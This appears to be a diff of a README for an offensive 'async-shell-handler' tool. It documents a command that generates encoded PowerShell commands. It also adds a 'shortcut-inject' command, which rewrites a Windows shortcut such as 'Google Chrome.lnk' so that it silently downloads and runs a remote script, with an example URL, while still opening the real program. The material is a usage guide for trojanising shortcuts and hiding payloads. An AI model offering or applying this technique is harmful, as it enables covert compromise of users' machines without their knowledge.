xor-function/fathomless/async-shell-handler/README.md

 * gen-enccmd "your command string"
 Generates a PowerShell formatted encoded command.
 Insure to quote your command string.

+* shortcut-inject "name-of-lnk" "Url-hosting-script" Modifies the specified shortcut to run the original program and also execute a download and execute command string.
+Ex: "Google Chrome.lnk" "http://some-doman.com/hello.ps1" Requires the http:// or https:// in the URL.
 ```
 gen-enccmd "cmd /c ipconfig /all"
 ```